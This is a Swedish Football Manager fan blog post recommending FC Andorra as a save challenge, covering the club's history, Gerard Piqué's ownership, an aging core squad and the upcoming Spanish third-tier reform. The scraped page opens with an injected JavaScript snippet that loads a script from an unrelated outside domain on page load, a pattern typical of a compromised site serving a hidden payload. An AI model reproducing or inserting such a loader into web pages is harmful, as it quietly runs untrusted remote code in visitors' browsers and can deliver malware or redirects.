;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: FC Andorra – FMSweden
Meny Stäng

Veckans inspiration: FC Andorra

Ni minns kanske att jag tidigare skrivit om FC Vaduz, ett lag från Liechtenstein som spelar i det schweiziska ligasystemet. Denna gång blir det något liknande, nämligen FC Andorra som spelar i det spanska seriesystemet. Klubben är – föga förvånande – landets största och grundades 1942. Deras största framgångar hittills är en vinst i katalanska cupen 1994 där de besegrade både FC Barcelona och Espanyol (oklart om det var bästa möjliga elva som spelade dock…). För närvarande befinner de sig i tredjeligan, Segunda Division B. Säsongen 2018/19 vann de femteligan och kunde sedan köpa sig (!) upp en division när ett annat lag inte fick spela p.g.a. för dålig ekonomi. Väldigt tråkigt naturligtvis, men sånt får man svälja helt enkelt. De lyckades dock ta en mittenplacering, så de visade att de höll tillräcklig nivå åtminstone. En annan rolig grej är att Gerard Pique är klubbens ägare, genom Kosmos Holding Group. Bara en sådan sak.

Lite synd är det ändå att truppen endast innehåller två spelare från Andorra vid start, särskilt eftersom bägge är utlånade. Å andra sidan är det fullt förståeligt med tanke på kvaliteteten där. En annan tråkig faktor är att lagets stomme i form av centrallinjen utgörs av fem av lagets bästa spelare och där alla har fyllt 33 år. Således behöver du relativt tidigt i saven ersätta dessa, vilken är lättare sagt än gjort. Vidare begär styrelsen en topp 3-placering första säsongen, vilket kan bli svårt att kombinera med en generationsväxling. För att krångla till det hela ytterligare ska det spanska seriesystemet reformeras inför säsongen 2021/22 där strukturen ska förändras en hel del. I nuläget består den tredje högsta divisionen av fem grupper som i sin tur är indelade i sub-grupper med 10-11 lag i varje. Topp-3 i varje sub-grupp får kvala vidare på något vis, fråga mig inte hur. Till sist är det endast fyra lag som går upp till andraligan, hur som helst. Efter omläggningen ska tredjeligan istället innehålla två serier med tjugo lag i varje, vilket blir betydligt enklare att greppa. Spanien-experten trashbag får gärna förklara mer utförligt i kommentarsfältet och mildra min förvirring något.

Nåja, FC Andorra verkar vara en rolig utmaning och det är det viktigaste i sammanhanget. Klarar du av att gå upp till andraligan för första gången någonsin, och kanske till och med La Liga? Det vore ju något!

 

FC Andorra.png

Please wait...

Liknande Inlägg

Lämna ett svar